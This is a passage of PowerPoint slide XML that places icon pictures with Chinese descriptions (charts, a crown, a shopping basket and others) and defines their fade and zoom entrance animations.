      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16" descr="线性数据图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId23">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId24"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1699260" y="3030855"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="图片 17" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId25">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId26"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="3141980"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="循环箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId27">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId28"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="2791460"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21" descr="信"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId29">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId30"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2324100"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="声音"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId31">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId32"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="2476500"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="图片 23" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId33">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId34"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="2324100"/>
            <a:ext cx="574040" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 24" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId35">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId36"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="2545080"/>
            <a:ext cx="527685" cy="527685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="图片 25" descr="上课"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId37">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId38"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4054475" y="1998980"/>
            <a:ext cx="476885" cy="476885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="图片 26" descr="皇冠"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId39">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId40"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047750" y="3238500"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="图片 27" descr="纸笔"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId41">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId42"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1040130"/>
            <a:ext cx="568325" cy="568325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="图片 28" descr="购物篮"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId43">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId44"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3317240" y="1901190"/>
            <a:ext cx="574675" cy="574675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="18" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2049"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="19" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="22" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2549"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="23" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="34" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3799"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="35" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="38" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="39" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="46" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5050"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="47" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="50" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5550"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="51" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
